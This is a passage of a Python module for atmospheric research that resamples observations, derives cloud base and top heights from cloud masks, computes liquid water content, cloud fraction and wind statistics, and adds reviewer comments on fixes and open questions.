    input: clouds    - list of xarray datasets of cloud properties
           PBLclouds - list of xarray datasets of PBL cloud properties
           date_arr  - array of days ('YYYYMMDD') to be processed
    output: minimum cloud base / top / thickness matrices (dimTime, Nfiles)
    full_update: a triplicated computation of the all-cloud minima was removed
    (the same three np.nanmin calls appeared twice back to back).
    """
    # one column per day on the standard 9-s grid (9600 samples per day)
    dimTime = 9600
    Nfiles = len(date_arr)
    CBarr_obs = np.zeros((dimTime, Nfiles))
    CTarr_obs = np.zeros((dimTime, Nfiles))
    TKarr_obs = np.zeros((dimTime, Nfiles))
    CBarr_PBL_obs = np.zeros((dimTime, Nfiles))
    CTarr_PBL_obs = np.zeros((dimTime, Nfiles))
    TKarr_PBL_obs = np.zeros((dimTime, Nfiles))

    for indFile in range(Nfiles):
        # reading the date
        date = date_arr[indFile]
        yy = int(date[0:4])
        mm = int(date[4:6])
        dd = int(date[6:8])
        # regular 9-s grid covering the whole day
        timeStandard = pd.date_range(start=datetime.datetime(yy, mm, dd, 0, 0, 0), \
                                     end=datetime.datetime(yy, mm, dd, 23, 59, 59), freq='9s')
        # reading xarray datasets of the day
        PBLcloud_dataset = PBLclouds[indFile]
        cloud_dataset = clouds[indFile]
        PBLCloudsStandard = PBLcloud_dataset.reindex({'time': timeStandard})

        # minimum over the layer axis: lowest base, lowest top, thinnest layer
        CBarr_obs[:, indFile] = np.nanmin(cloud_dataset.cloudBase.values, axis=1)
        CTarr_obs[:, indFile] = np.nanmin(cloud_dataset.cloudTop.values, axis=1)
        TKarr_obs[:, indFile] = np.nanmin(cloud_dataset.cloudThick.values, axis=1)
        CBarr_PBL_obs[:, indFile] = np.nanmin(PBLCloudsStandard.cloudBase.values, axis=1)
        CTarr_PBL_obs[:, indFile] = np.nanmin(PBLCloudsStandard.cloudTop.values, axis=1)
        TKarr_PBL_obs[:, indFile] = np.nanmin(PBLCloudsStandard.cloudThick.values, axis=1)

    # NOTE(review): CTarr_PBL_obs / TKarr_PBL_obs are computed but not returned,
    # matching the original interface; extend the tuple if callers need them.
    return (CBarr_obs, CTarr_obs, TKarr_obs, CBarr_PBL_obs)
#---------------------------------------------------------------------------------
def f_resampleArrays2StandardData(A, index, strDate):
    """
    author : Claudia Acquistapace
    date   : 10/04/2020
    goal   : resample a 1-d time series with missing times onto the standard
             day grid of 9600 samples (9-s steps starting at strDate), with
             NaN wherever data are missing.
    input  : A (values), index (DatetimeIndex of A), strDate ('YYYY-MM-DD')
    output : ndarray of length 9600
    full_update: ``Series.loc`` with partially-missing labels raises KeyError
    in pandas >= 1.0; ``reindex`` implements the documented NaN fill.
    """
    import numpy as np
    import pandas as pd
    DF = pd.Series(A, index=index)
    # regular 9-s time grid for the whole day (9600 samples)
    full_index = pd.date_range(strDate, periods=9600, freq='9s')
    # reindex aligns on the grid and inserts NaN for missing timestamps
    DFresampled = DF.reindex(full_index)
    return(DFresampled.values)
#---------------------------------------------------------------------------------
def f_resample2StandardData(A, index, cols, strDate):
    """
    author : Claudia Acquistapace
    date   : 10/04/2020
    goal   : resample a 2-d (time x height) matrix with missing times onto the
             standard day grid of 9600 samples (9-s steps starting at strDate),
             with NaN rows wherever data are missing.
    input  : A (matrix), index (DatetimeIndex of A), cols (column labels),
             strDate ('YYYY-MM-DD')
    output : ndarray of shape (9600, len(cols))
    full_update: ``DataFrame.loc`` with partially-missing labels raises
    KeyError in pandas >= 1.0; ``reindex`` implements the documented NaN fill.
    """
    import numpy as np
    import pandas as pd
    DF = pd.DataFrame(A, index=index, columns=cols)
    # regular 9-s time grid for the whole day (9600 samples)
    full_index = pd.date_range(strDate, periods=9600, freq='9s')
    # reindex aligns rows on the grid and inserts NaN rows for missing times
    DFresampled = DF.reindex(full_index)
    return(DFresampled.values)
#aa
# closest function
#---------------------------------------------------------------------------------
# date : 16.10.2017
# author: Claudia Acquistapace
# goal: return the index of the element of the input array that in closest to the value provided to the function
def f_closest(array,value):
    """Return the index of the element of *array* nearest to *value*."""
    distances = np.abs(array - value)
    return distances.argmin()
def getNearestIndex(timeRef, timeStamp):
    """Return the positional index of the entry of ``timeRef.index`` nearest to
    *timeStamp*, or NaN when the lookup fails (e.g. non-monotonic index or
    incomparable timestamp).
    full_update: ``Index.get_loc(key, method='nearest')`` was removed in
    pandas 2.0; the lookup now uses ``get_indexer``. The original bare
    ``except`` is narrowed to the exceptions pandas actually raises here.
    """
    try:
        index = timeRef.index.get_indexer([timeStamp], method='nearest')[0]
    except (KeyError, TypeError, ValueError):
        index = np.nan
    return index
def getIndexList(dataTable, reference):
    """For each timestamp in *reference*, return the positional index of the
    nearest entry in *dataTable* (NaN where no match could be found). The
    lookup itself is delegated to getNearestIndex."""
    return [getNearestIndex(dataTable, value) for value in reference]
def getIndexListsuka(dataTable, reference):
    """Like getIndexList but without the NaN fallback: any lookup failure
    propagates as an exception.
    full_update: ``Index.get_loc(value, method='nearest')`` was removed in
    pandas 2.0; the lookup now uses ``get_indexer`` with method='nearest'.
    """
    index = dataTable.index
    return [index.get_indexer([value], method='nearest')[0] for value in reference]
def getResampledDataPd(emptyDataFrame, LessResolvedDataFrame, indexList):
    """Fill *emptyDataFrame* (high-resolution grid) row by row with the rows of
    *LessResolvedDataFrame* selected by the positions in *indexList*.

    Entries of *indexList* may be NaN (no near match found by getNearestIndex):
    those rows keep their placeholder values. Returns the filled frame.
    full_update: the bare ``except: pass`` is narrowed to the exceptions iloc
    actually raises for NaN / out-of-range positions, so genuine bugs surface.
    """
    for i, index in enumerate(indexList):
        try:
            emptyDataFrame.iloc[i] = LessResolvedDataFrame.iloc[index]
        except (IndexError, TypeError, ValueError):
            # index is NaN (no match) or out of range: keep the placeholder row
            pass
    return emptyDataFrame
# function to calculate LWC from
#---------------------------------------------------------------------------------
# date : 23.10.2019
# author: Claudia Acquistapace
# goal: calculate LWC using standard Frisch approach
# input: linear reflectivity matrix, radar range gate resolution (assumed constant), \
#time array, height attar, LWP time serie
# output: LWC matrix (time, height)
def f_calculateLWCFrisch(Ze_lin, deltaZ, datetime_ICON, height_ICON, LWP_obs_res):
    """Calculate liquid water content using the standard Frisch approach.

    LWC(t, h) = LWP(t) * sqrt(Ze(t, h)) / (deltaZ * sum_h sqrt(Ze(t, h)))

    Parameters
    ----------
    Ze_lin : (time, height) linear reflectivity matrix
    deltaZ : radar range gate resolution (assumed constant) [m]
    datetime_ICON : time array
    height_ICON : height array
    LWP_obs_res : LWP time series at the same time resolution

    Returns
    -------
    LWC_Frisch : (time, height) matrix of liquid water content
    """
    LWC_Frisch = np.zeros((len(datetime_ICON), len(height_ICON)))
    LWC_Frisch.fill(np.nan)
    # prepend nan: shifts the LWP series by one sample relative to the time
    # array — assumed deliberate alignment with the radar sampling; TODO confirm
    LWP_obs_res = np.insert(LWP_obs_res, 0, np.nan)
    for indT in range(len(datetime_ICON)):
        # the denominator depends on the whole profile only, not on the
        # height index: hoisted out of the inner loop (was recomputed per gate)
        den = deltaZ * np.nansum(np.sqrt(Ze_lin[indT, :]))
        for indH in range(len(height_ICON)):
            num = LWP_obs_res[indT] * np.sqrt(Ze_lin[indT, indH])
            LWC_Frisch[indT, indH] = num / den
    return (LWC_Frisch)
# function to define cb and ct of the first cloud layer in a column appearing when reading from the top
#---------------------------------------------------------------------------------
# date : 31.01.2019
# author: Claudia Acquistapace
# goal: derive cloud base and cloud top heights of the cloud layers found in a cloud mask
def f_calcCloudBaseTop(cloudMask, dimTime, dimHeight, height):
    """Derive cloud base and cloud top heights from a cloud mask.

    The mask is binarised (any non-zero flag = cloudy) and differentiated
    along the height axis; the +1/-1 transitions mark the edges of each
    cloud layer. All edges found per time stamp are stored, padded with nan
    up to the maximum layer count of the day.

    Returns (CBarray, CTarray): (dimTime, Nlayers) matrices of base / top heights.
    """
    # binarise the mask: any non-zero cloud flag becomes 1
    binary = np.zeros((dimTime, dimHeight))
    for tt in range(dimTime):
        for hh in range(dimHeight):
            if cloudMask[tt, hh] != 0.:
                binary[tt, hh] = 1
    # transitions along height: +1 entering cloud, -1 leaving it
    edges = np.diff(binary, axis=1)
    # maximum number of transitions found on any time stamp sizes the output
    countsCB = [len(np.where(edges[tt, :] == 1.)[0][:]) for tt in range(dimTime)]
    countsCT = [len(np.where(edges[tt, :] == -1.)[0][:]) for tt in range(dimTime)]
    CBarray = np.full((dimTime, max(countsCB)), np.nan)
    CTarray = np.full((dimTime, max(countsCT)), np.nan)
    for tt in range(dimTime):
        col = edges[tt, :]
        # NOTE(review): -1 transitions are stored as bases and +1 as tops,
        # matching the original convention — presumably tied to the model's
        # height ordering; confirm against callers
        baseIdx = np.where(col == -1.)[0][:]
        topIdx = np.where(col == 1.)[0][:]
        CBarray[tt, 0:len(baseIdx)] = height[baseIdx]
        CTarray[tt, 0:len(topIdx)] = height[topIdx]
    return (CBarray, CTarray)
# function to define cb and ct of boundary layer clouds in a column appearing when reading from the top
#---------------------------------------------------------------------------------
# date : 22.10.2019
# author: Claudia Acquistapace
# input: cloudMask, dimension of time array, dimension of height array, height from model/obs (cloudnet)
# output: array of:
# - CBarray: time array having 4 dimensions to record four different cloud base heights per time stamp
# - CTarray: time array having 4 dimensions to record four different cloud top heights per time stamp
# - NlayersArray: number of distinct cloud layers identified per time stamp
# - CB_collective: minimum cloud base identified per time stamp
# - CT_collective: maximum cloud top identified per time stamp
# goal:
def f_calcCloudBaseTopPBLclouds(cloudMask, dimTime, dimHeight, height, cloudTimeArray, time):
    """Derive cloud base / top heights of boundary layer clouds from a cloud mask.

    Parameters
    ----------
    cloudMask : (dimTime, dimHeight) matrix; non-zero entries flag cloudy pixels
    dimTime : dimension of the time array
    dimHeight : dimension of the height array
    height : height array from model / obs (cloudnet)
    cloudTimeArray : [timeStart, timeEnd] pair bounding the (manually selected)
        interval in which PBL clouds are expected
    time : time array used to index the output series

    Returns
    -------
    tuple (CBarray, CTarray, NlayersArray, CB_PBL_out, CT_PBL_out,
           CB_collective, CT_collective):
    - CBarray / CTarray : all cloud bases / tops found per time stamp
    - NlayersArray : number of distinct cloud layers per time stamp
    - CB_PBL_out / CT_PBL_out : collective base / top restricted to the
      cloudTimeArray window (nan outside it, and everywhere when no cloud
      edges are found at all)
    - CB_collective / CT_collective : minimum base / maximum top per time stamp
    """
    # converting cloud mask to 1 / 0 matrices
    BinaryMatrix = np.zeros((dimTime, dimHeight))
    for itime in range(dimTime):
        for iH in range(dimHeight):
            if cloudMask[itime,iH] != 0.:
                BinaryMatrix[itime,iH] = 1
    # gradient of the binary cloud mask along height: +1 / -1 mark the
    # transitions into / out of cloud
    gradBinary = np.diff(BinaryMatrix,axis=1)
    # counting max number of cloud base/cloud top found per time stamp
    numberCB = []
    numberCT = []
    for itime in range(dimTime):
        column = gradBinary[itime,:]
        numberCB.append(len(np.where(column == 1.)[0][:]))
        numberCT.append(len(np.where(column ==-1.)[0][:]))
    NCB=max(numberCB)
    NCT=max(numberCT)
    # cloud base / top arrays, nan-padded to the day's maximum layer count
    CBarray = np.zeros((dimTime,NCB))
    CBarray.fill(np.nan)
    CTarray = np.zeros((dimTime,NCT))
    CTarray.fill(np.nan)
    NlayersArray = np.zeros((dimTime))
    NlayersArray.fill(np.nan)
    # if no cloud bases or no cloud tops are found, then CB and CT are assigned to nan
    if (NCB == 0) or (NCT == 0):
        CB_collective = np.zeros((dimTime))
        CB_collective.fill(np.nan)
        CT_collective = np.zeros((dimTime))
        CT_collective.fill(np.nan)
        CB_PBL_out = np.zeros((dimTime))
        CB_PBL_out.fill(np.nan)
        CT_PBL_out = np.zeros((dimTime))
        CT_PBL_out.fill(np.nan)
    else:
        # if some cloud base / cloud tops are found, all the found values are stored.
        # NOTE(review): -1 transitions are stored as bases and +1 as tops —
        # presumably consistent with the model's height ordering; confirm
        for iTime in range(dimTime):
            column = gradBinary[iTime,:]
            indCB = np.where(column == -1.)[0][:]
            NfoundCB = len(indCB)
            indCT = np.where(column == 1.)[0][:]
            NfoundCT = len(indCT)
            CBarray[iTime,0:NfoundCB] = height[indCB]
            CTarray[iTime,0:NfoundCT] = height[indCT]
            NlayersArray[iTime] = numberCB[iTime]
        # we define a collective cloud base/top to consider multilayer PBL
        # clouds as one: min CB and max CT for each time stamp
        CB_collective = np.asarray(CBarray[:,0])
        CT_collective = np.asarray(CTarray[:,0])
        for ind in range(dimTime):
            CB_collective[ind] = np.nanmin(CBarray[ind,:])
            CT_collective[ind] = np.nanmax(CTarray[ind,:])
        # filtering clouds in PBL using human (per-hour) filtering: keep the
        # collective base/top only inside the selected time window
        timeStart = cloudTimeArray[0]
        timeEnd = cloudTimeArray[1]
        CB_PBL = pd.Series(np.repeat(np.nan, len(time)), index=time)
        maskt = (CB_PBL.index > timeStart) * (CB_PBL.index < timeEnd)
        CB_PBL.loc[maskt] = CB_collective[maskt]
        CT_PBL = pd.Series(np.repeat(np.nan, len(time)), index=time)
        maskt = (CT_PBL.index > timeStart) * (CT_PBL.index < timeEnd)
        CT_PBL.loc[maskt] = CT_collective[maskt]
        CT_PBL_out = CT_PBL.values
        CB_PBL_out = CB_PBL.values
    return (CBarray, CTarray, NlayersArray, CB_PBL_out, CT_PBL_out, CB_collective, CT_collective)
def f_calcCloudBaseTopPBLcloudsV2(cloudMask, dimTime, dimHeight, height, cloudTimeArray, \
                                  time):
    """
    @ author: cacquist
    @ date  : 10 November 2019
    @ goal  : this function corresponds to the version2 processing mode. It has been
             generated to detect PBL clouds over JOYCE and it has been tuned with
             statistical observed mean PBL cloud properties from the site.
    INPUT:
        - cloudMask      : matrix of 0/1 containing cloud mask
        - dimTime        : dimension of time array
        - dimHeight      : dimension of height array
        - cloudTimeArray : [timeStart, timeEnd] window in which PBL clouds are searched
        - time           : time array
    OUTPUTS:
        - CBarray       : array containing all cloud bases found with the gradient method
        - CTarray       : array containing all cloud tops found with the gradient method
        - NlayersArray  : number of cloud base/top found for each time
        - CB_PBL_out    : array of boundary layer cloud bases found
        - CT_PBL_out    : array of boundary layer cloud tops found
        - CB_collective : array of minimum cloud base found
        - CT_collective : array of maximum cloud top found
    Methodology:
    It sets the cloud base to be below 2500 mt and the cloud geometrical thickness
    to be 600 mt.
    Check for cloud base height to be below 2500 mt:
        If cloud base does not fulfill the condition, no PBL cloud
        base and top are found and it returns nans.
        If cloud base fulfills the condition, then it checks for cloud tops.
            If maximum cloud top is found above the CB + 600 mt, lower cloud
            tops are searched among the cloud tops below that height and the
            minimum is taken.
            If none are found, cloud top and cloud base are assigned to nan.
    """
    # tuned mean geometrical thickness and maximum base height for JOYCE PBL clouds
    meanCloudThickness = 600.
    minCBheight = 2500.
    # converting cloud mask to 1 / 0 matrices
    BinaryMatrix = np.zeros((dimTime, dimHeight))
    for itime in range(dimTime):
        for iH in range(dimHeight):
            if cloudMask[itime,iH] != 0.:
                BinaryMatrix[itime,iH] = 1
    # gradient of the binary cloud mask along height: +1 / -1 mark the
    # transitions into / out of cloud
    gradBinary = np.diff(BinaryMatrix,axis=1)
    # counting max number of cloud base/cloud top found per time stamp
    numberCB = []
    numberCT = []
    for itime in range(dimTime):
        column = gradBinary[itime,:]
        numberCB.append(len(np.where(column == 1.)[0][:]))
        numberCT.append(len(np.where(column ==-1.)[0][:]))
    NCB=max(numberCB)
    NCT=max(numberCT)
    # cloud base / top arrays, nan-padded to the day's maximum layer count
    CBarray = np.zeros((dimTime,NCB))
    CBarray.fill(np.nan)
    CTarray = np.zeros((dimTime,NCT))
    CTarray.fill(np.nan)
    NlayersArray = np.zeros((dimTime))
    NlayersArray.fill(np.nan)
    # if no cloud bases or no cloud tops are found, then CB and CT are assigned to nan
    if (NCB == 0) or (NCT == 0):
        CB_collective = np.zeros((dimTime))
        CB_collective.fill(np.nan)
        CT_collective = np.zeros((dimTime))
        CT_collective.fill(np.nan)
        CB_PBL_out = np.zeros((dimTime))
        CB_PBL_out.fill(np.nan)
        CT_PBL_out = np.zeros((dimTime))
        CT_PBL_out.fill(np.nan)
    else:
        # if some cloud base / cloud tops are found, all the found values are stored.
        # NOTE(review): -1 transitions are stored as bases and +1 as tops —
        # presumably consistent with the model's height ordering; confirm
        for iTime in range(dimTime):
            column = gradBinary[iTime,:]
            indCB = np.where(column == -1.)[0][:]
            NfoundCB = len(indCB)
            indCT = np.where(column == 1.)[0][:]
            NfoundCT = len(indCT)
            CBarray[iTime,0:NfoundCB] = height[indCB]
            CTarray[iTime,0:NfoundCT] = height[indCT]
            NlayersArray[iTime] = numberCB[iTime]
        # we define a collective cloud base/top to consider multilayer PBL
        # clouds as one: min CB and max CT for each time stamp
        CB_collective = np.asarray(CBarray[:,0])
        CT_collective = np.asarray(CTarray[:,0])
        CB_PBL_out = np.repeat(np.nan, len(time))
        CT_PBL_out = np.repeat(np.nan, len(time))
        for ind in range(dimTime):
            CB_collective[ind] = np.nanmin(CBarray[ind,:])
            CT_collective[ind] = np.nanmax(CTarray[ind,:])
            # selecting temporal window in which cloud top and base for PBL clouds have to be calculated
            if (time[ind] > cloudTimeArray[0]) * (time[ind] < cloudTimeArray[1]):
                if (CB_collective[ind] < minCBheight):
                    # for boundary layer clouds, we can assume the lowest cloud base is correct.
                    # we can also assume that from the lowest cloud base, the cloud does not
                    # extend in the vertical for more than meanCloudThickness; if the max cloud
                    # top is above that limit, we select among cloud tops those located
                    # within such distance from cloud base
                    maxCTheightPBL = np.nanmin(CBarray[ind,:]) + meanCloudThickness
                    # NOTE(review): when the maximum cloud top is already within the
                    # allowed thickness, CT_PBL_out/CB_PBL_out stay nan — looks
                    # unintended; confirm against the processing chain
                    if (np.nanmax(CTarray[ind,:]) > maxCTheightPBL):
                        findLowerCT = np.where(CTarray[ind,:] < maxCTheightPBL)
                        if (len(findLowerCT[0]) == 0): # no elements are found below the maximum allowed height for cloud top
                            CT_PBL_out[ind] = np.nan
                            CB_PBL_out[ind] = np.nan
                        else:
                            CT_PBL_out[ind] = np.nanmin(CTarray[ind,findLowerCT]) # assigning minimum cloud top
                            CB_PBL_out[ind] = CB_collective[ind] # assigning cloud base if it is below 2500 mt
    return (CBarray, CTarray, NlayersArray, CB_PBL_out, CT_PBL_out, CB_collective, CT_collective)
#---------------------------------------------------------------------------------
# date : 28.01.2019
# author: Claudia Acquistapace
# goal: function that calculates cloud fraction over 30 minutes of time for the whole day for ICON-LEM
# input:
# QI_ICON_LEM, \
# QC_ICON_LEM,
# datetime_ICON,
# height_2_ICON_LEM,
# QiThreshold,
# QcThreshold
#
# output:
# mean_CF_liquid_ICON,
# mean_CF_ice_ICON,
# mean_CF_tot_ICON,
# datetime_out
#--------------------------------------------------------------------------------
def f_calculateCloudFractionICON(QI, QC, yy, mm, dd, time, height, QiThreshold, QcThreshold):
    """Calculate half-hourly cloud fraction profiles (liquid / ice / total)
    for ICON-LEM over one day.

    Parameters
    ----------
    QI, QC : (time, height) matrices of ice / liquid water mixing ratio
    yy, mm, dd : year / month / day of the processed day
    time : array of datetimes labelling the rows of QI/QC
    height : array of heights labelling the columns of QI/QC
    QiThreshold, QcThreshold : thresholds above which a grid box counts as
        ice / liquid cloudy

    Returns
    -------
    dict with keys 'TotalCloudFraction', 'LiquidCloudFraction',
    'IceCloudFraction' (each of shape (48, len(height))), 'height', and
    'time' (48 half-hour interval start times).
    """
    # pandas frames indexed by time/height allow slicing by time interval
    QI_ICON_DF = pd.DataFrame(QI, index=time, columns=height)
    QC_ICON_DF = pd.DataFrame(QC, index=time, columns=height)
    # 48 half-hour slots per day; the height dimension is taken from the
    # input (was hard-coded to 150, which broke for other vertical grids)
    nHeight = len(height)
    mean_CF_liquid_ICON = np.zeros((48, nHeight))
    mean_CF_ice_ICON = np.zeros((48, nHeight))
    mean_CF_tot_ICON = np.zeros((48, nHeight))
    deltaT = datetime.timedelta(minutes=30)
    datetime_out = []
    # --- loop on half-hour intervals to calculate the mean profile
    for itime in range(0, 48):
        if itime == 0:
            HourInf = datetime.datetime(int(yy), int(mm), int(dd), 0, 0, 0)
        else:
            HourInf = HourInf + deltaT
        HourSup = HourInf + deltaT
        datetime_out.append(HourInf)
        # strict comparisons: samples exactly on an interval edge are
        # excluded — assumed intentional; TODO confirm
        Qi_sliced_t = QI_ICON_DF.loc[(QI_ICON_DF.index < HourSup) * (QI_ICON_DF.index > HourInf), :]
        Qc_sliced_t = QC_ICON_DF.loc[(QC_ICON_DF.index < HourSup) * (QC_ICON_DF.index > HourInf), :]
        # ---- loop on heights: cloud fraction = (# samples above threshold)
        # / (# samples in the interval). NOTE(review): the last height level
        # is never filled (range stops at len(height)-1) — kept as original
        for iheight in range(len(height) - 1):
            DF_qi_arr = Qi_sliced_t.loc[:, height[iheight]]
            DF_qc_arr = Qc_sliced_t.loc[:, height[iheight]]
            NelemTot = len(DF_qi_arr)
            # ice cloud: qi above threshold while qc below threshold
            Cond_iceClouds = np.isfinite(DF_qi_arr[DF_qi_arr > QiThreshold] * DF_qc_arr[DF_qc_arr < QcThreshold])
            Num_iceCloud = Cond_iceClouds.sum()
            # liquid cloud: qc above threshold while qi below threshold
            Cond_LiquidClouds = np.isfinite(DF_qc_arr[DF_qi_arr < QiThreshold] * DF_qc_arr[DF_qc_arr > QcThreshold])
            Num_liquidCloud = Cond_LiquidClouds.sum()
            if float(NelemTot) == 0:
                print('Houston, we have a problem!')
            else:
                mean_CF_ice_ICON[itime, iheight] = float(Num_iceCloud) / float(NelemTot)
                mean_CF_liquid_ICON[itime, iheight] = float(Num_liquidCloud) / float(NelemTot)
                mean_CF_tot_ICON[itime, iheight] = float(Num_iceCloud + Num_liquidCloud) / float(NelemTot)
    # dictionary containing the output data
    dict_CF = {
        'TotalCloudFraction': mean_CF_tot_ICON,
        'LiquidCloudFraction': mean_CF_liquid_ICON,
        'IceCloudFraction': mean_CF_ice_ICON,
        'height': height,
        'time': datetime_out,
    }
    return (dict_CF)
def f_plotTest(matrix, time, height, figname):
    """Quick-look plot of the model cloud mask: a time/height colour map with
    a four-class colour bar (no cloud / liquid / ice / mixed phase).

    The figure is written to <pathFig><figname>_cloudMask.png; an empty tuple
    is returned.
    """
    pathFig = '/work/cacquist/HDCP2_S2/statistics/figs/patch003/figures_JAMES/'
    fig, ax = plt.subplots(figsize=(10, 5))
    # cosmetics: hide top/right spines, ticks only on bottom/left axes
    for side in ("top", "right"):
        ax.spines[side].set_visible(False)
    ax.get_xaxis().tick_bottom()
    ax.get_yaxis().tick_left()
    matplotlib.rc('xtick', labelsize=10)  # sets dimension of ticks in the plots
    matplotlib.rc('ytick', labelsize=10)  # sets dimension of ticks in the plots
    hourFormatter = mdates.DateFormatter("%H:%M")
    ax.xaxis.set_major_formatter(hourFormatter)
    ax.xaxis.set_minor_formatter(hourFormatter)
    # four discrete colours, one per cloud class (values 0..3)
    mesh = ax.pcolormesh(time, height, matrix, vmin=0, vmax=3,
                         cmap=plt.cm.get_cmap("GnBu", 4))
    ax.set_ylim(0., 15000)  # limits of the y-axes
    ax.set_title("cloud mask model", fontsize=10)
    ax.set_xlabel("time [hh:mm]", fontsize=10)
    ax.set_ylabel("height [m]", fontsize=10)
    cbar = fig.colorbar(mesh, ticks=[0, 1, 2, 3], orientation='vertical', aspect=10)
    cbar.ticks = ([0, 1, 2, 3])
    cbar.ax.set_yticklabels(['no cloud', 'liquid', 'ice', 'mixed phase'])
    cbar.set_label(label="cloud type", size=10)
    cbar.ax.tick_params(labelsize=10)
    plt.tight_layout()
    plt.savefig(pathFig + figname + '_cloudMask.png')
    return ()
""" function to derive wind speed and direction
#---------------------------------------------------------------------------------
date : 17.12.2018
author: Claudia Acquistapace (cacquist@meteo.uni-koeln.de)
goal: derive wind speed and direction in form of list and matrices
input:
- datetime_ICON: time array
- height_ICON: height array
- u_ms: zonal wind
- v_ms: meridional wind
output:
- ws: list of wind speed
- wd: list of wind directions
- wind_abs: matrix of wind speed
- wind_dir_trig_from_degrees: matrix of wind direction in degrees indicating
the direction from where wind is coming
"""
#--------------------------------------------------------------------------------
def f_calcWindSpeed_Dir(datetime_ICON, height_ICON, u_ms, v_ms):
    """Derive horizontal wind speed and direction from zonal/meridional wind.

    Parameters
    ----------
    datetime_ICON : time array
    height_ICON : height array
    u_ms, v_ms : (time, height) matrices of zonal / meridional wind [m/s]

    Returns
    -------
    dict with keys
      'windSpeed'     : list of wind speeds [m/s]
      'windDirection' : list of directions [deg] from which the wind comes
    Only finite samples with non-zero speed are kept; the lists are aligned.
    """
    import math
    wind_abs = np.sqrt(u_ms**2 + v_ms**2)
    wind_dir_trig_to = np.zeros((len(datetime_ICON), len(height_ICON)))
    wind_dir_trig_to_degrees = np.zeros((len(datetime_ICON), len(height_ICON)))
    wind_dir_trig_from_degrees = np.zeros((len(datetime_ICON), len(height_ICON)))
    wind_dir_cardinal = np.zeros((len(datetime_ICON), len(height_ICON)))
    ws = []
    wd = []
    for itime in range(len(datetime_ICON)):
        for iHeight in range(len(height_ICON)):
            # wind dir in unit circle coordinates (counterclockwise, zero on the x-axis)
            wind_dir_trig_to[itime, iHeight] = math.atan2(v_ms[itime, iHeight], u_ms[itime, iHeight])
            # wind dir in degrees: direction where the wind goes
            wind_dir_trig_to_degrees[itime, iHeight] = wind_dir_trig_to[itime, iHeight] * 180/math.pi
            # wind dir in degrees: direction from where the wind comes
            wind_dir_trig_from_degrees[itime, iHeight] = wind_dir_trig_to_degrees[itime, iHeight] + 180
            # cardinal coordinates (computed for completeness; not returned)
            wind_dir_cardinal[itime, iHeight] = 90 - wind_dir_trig_from_degrees[itime, iHeight]
            if np.isfinite(wind_dir_trig_from_degrees[itime, iHeight]) and \
               np.isfinite(wind_abs[itime, iHeight]) and \
               (wind_abs[itime, iHeight] != 0.):
                wd.append(wind_dir_trig_from_degrees[itime, iHeight])
                ws.append(wind_abs[itime, iHeight])
    # BUG FIX: the two lists were previously stored under swapped keys
    # ('windDirection': ws, 'windSpeed': wd); ws holds speeds and wd holds
    # directions, as described in the module docstring above.
    WindDictionary = {'windDirection': wd,
                      'windSpeed': ws,
                      }
    return (WindDictionary)
# function to plot color time heigth maps from a dictionary of initial data
#---------------------------------------------------------------------------------
# date : 14.12.2018
# author: Claudia Acquistapace (cacquist@meteo.uni-koeln.de)
# goal: function to derive pdfs of vertical and horizontal wind below cloud base
# check for vertical wind values observed below cloud base. for every time stamp.
# methodology: for observations:
# if there is cloud base in observations, store vertical wind values recorded in the 300m below cloud base.
# if there is no cloud, store vertical wind values in the 5 bins below mean estimated cloud base.
# input : vertical wind, horizontal wind, time, height
# output: verticalWindPDF_cloud, verticalWindPDF_nocloud, horizontalWindPDF_cloud, horizontalWindPDF_nocloud
#--------------------------------------------------------------------------------
def f_pdfsBelowCloudBase(w_ICON, Hwind, height, datetime_ICON, datetimeHourArr, height_ICON, mean_CB_arr_OBS, CB_array_OBS, timeStart, timeEnd):
    """Collect vertical and horizontal wind values below cloud base.

    For every time stamp inside [timeStart, timeEnd]:
    - if an observed cloud base exists, wind values within distHeight below
      that base go into the *_cloud lists;
    - otherwise, the mean hourly cloud base (mean_CB_arr_OBS at the closest
      hour) is used and values go into the *_nocloud lists.

    Parameters
    ----------
    w_ICON, Hwind : (time, height) vertical / horizontal wind matrices
    height, height_ICON : height axes for w_ICON and Hwind respectively
    datetime_ICON : time array of the wind matrices
    datetimeHourArr : hourly time array matching mean_CB_arr_OBS
    mean_CB_arr_OBS : mean observed cloud base per hour
    CB_array_OBS : observed cloud base per time stamp (nan = no cloud)
    timeStart, timeEnd : bounds of the analysed time window

    Returns
    -------
    (verticalWindPDF_cloud, verticalWindPDF_nocloud,
     horizontalWindPDF_cloud, horizontalWindPDF_nocloud) : lists of samples
    """
    def _winds_below(indTime, CBHeight):
        # wind values in the distHeight-deep layer just below CBHeight
        maskW = (vertWind_ICON_DF.columns < CBHeight) * (vertWind_ICON_DF.columns > CBHeight - distHeight)
        maskH = (HorWind_ICON_DF.columns < CBHeight) * (HorWind_ICON_DF.columns > CBHeight - distHeight)
        return (vertWind_ICON_DF.values[indTime, maskW].flatten(),
                HorWind_ICON_DF.values[indTime, maskH].flatten())

    verticalWindPDF_cloud = []
    horizontalWindPDF_cloud = []
    verticalWindPDF_nocloud = []
    horizontalWindPDF_nocloud = []
    distHeight = 400.
    vertWind_ICON_DF = pd.DataFrame(w_ICON, index=datetime_ICON, columns=height)
    HorWind_ICON_DF = pd.DataFrame(Hwind, index=datetime_ICON, columns=height_ICON)
    for indTime in range(len(datetime_ICON)):
        # skip samples outside the analysed time window
        if not ((datetime_ICON[indTime] > timeStart) * (datetime_ICON[indTime] < timeEnd)):
            continue
        if np.isfinite(CB_array_OBS[indTime]) == False:
            # no observed cloud: fall back to the mean hourly cloud base
            findHourInd = f_closest(np.asarray(datetimeHourArr), datetime_ICON[indTime])
            valuesWwind, valuesHwind = _winds_below(indTime, mean_CB_arr_OBS[findHourInd])
            verticalWindPDF_nocloud.extend(valuesWwind)
            horizontalWindPDF_nocloud.extend(valuesHwind)
        else:
            # cloud present: use the observed cloud base of this time stamp
            valuesWwind, valuesHwind = _winds_below(indTime, CB_array_OBS[indTime])
            verticalWindPDF_cloud.extend(valuesWwind)
            horizontalWindPDF_cloud.extend(valuesHwind)
    return (verticalWindPDF_cloud, verticalWindPDF_nocloud, horizontalWindPDF_cloud, horizontalWindPDF_nocloud)
def f_calcPblHeightRN(thetaV, Uwind, Vwind, height, time, device):
    """
    PBL height from the bulk Richardson number (Seidel et al., 2010).

    The Richardson number is computed per (time, height) from virtual
    potential temperature and wind shear; the PBL height is the distance
    between the highest level where Ri exceeds 0.25 and the last height
    level, or 0 when no level exceeds the threshold.

    created 15.01.2018, modified 05.12.2019, author: Claudia Acquistapace
    """
    g = 9.8                 # gravity constant
    Rithreshold = 0.25      # threshold value for Ri
    nTime = len(time)
    nHeight = len(height)
    # surface reference height: model grids keep the surface at index 149,
